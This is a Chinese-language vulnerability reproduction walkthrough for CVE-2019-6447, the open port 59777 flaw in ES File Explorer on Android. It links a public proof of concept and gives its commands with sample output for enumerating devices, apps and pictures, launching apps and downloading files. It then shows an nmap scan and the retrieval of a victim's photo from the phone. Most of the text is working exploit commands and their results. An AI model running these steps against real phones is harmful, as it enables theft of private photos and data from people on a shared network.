【漏洞復現】ES File Explorer Open Port Vulnerability - CVE-2019-6447

漏洞描述

在受影響的ES文件瀏覽器上，會啓用59777/tcp端口做爲HTTP服務器，攻擊者只須要構造惡意的json請求就能夠對受害者進行文件下載，應用打開。更能夠用過漏洞進行中間人(MITM)攻擊。

受影響版本

4.1.9.7.4及如下

POC地址

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

POC使用方法

POC在使用以前須要安裝如下三個模塊

requests
pylint
autopep8

 

能夠利用pip3來安裝它們

$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg

$ python poc.py --cmd appPull --pkg com.tencent.mm

$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm

$ python poc.py --cmd appLaunch --pkg com.tencent.mm
{"result":"0"}

$ python poc.py --cmd getDeviceInfo
{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"}

$ python poc.py --cmd listAppsAll
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"},
{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsPhone
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsSystem
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listApps
{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"}

$ python poc.py --cmd listAppsSdcard

$ python poc.py --cmd listAudios
{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", }

$ python poc.py --cmd listPics
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }

$ python poc.py --cmd listVideos

$ python poc.py --cmd listFiles

$ python poc.py --cmd listFiles --network 192.168.1.

$ python poc.py list

######################
# Available Commands #
######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

漏洞利用過程

首先在Android上安裝受影響的版本ES文件瀏覽器

使用nmap查看是否開啓57999端口

sudo nmap -sS -p 59777 -v 192.168.0.100

目標開啓後，就能夠利用POC驗證是否存在漏洞

python3 poc.py --cmd getDeviceInfo --network 192.168.0.

 

經過執行getDeiceInfo來查看系統的信息

PACT00就是你的手機型號了

再來利用listPics來列出手機裏圖片的路徑

有不少，隨便從中選一個，利用-g來下載它

-g後面的路徑參數必定要跟剛纔獲取到的信息來判斷

而後輸入如下路徑

python3 poc.py -g /sdcard/Tencent/QQ_Images/-1915ed44cc2d41ae.jpg

 

 這張圖片是

下載後就會保存在當前目錄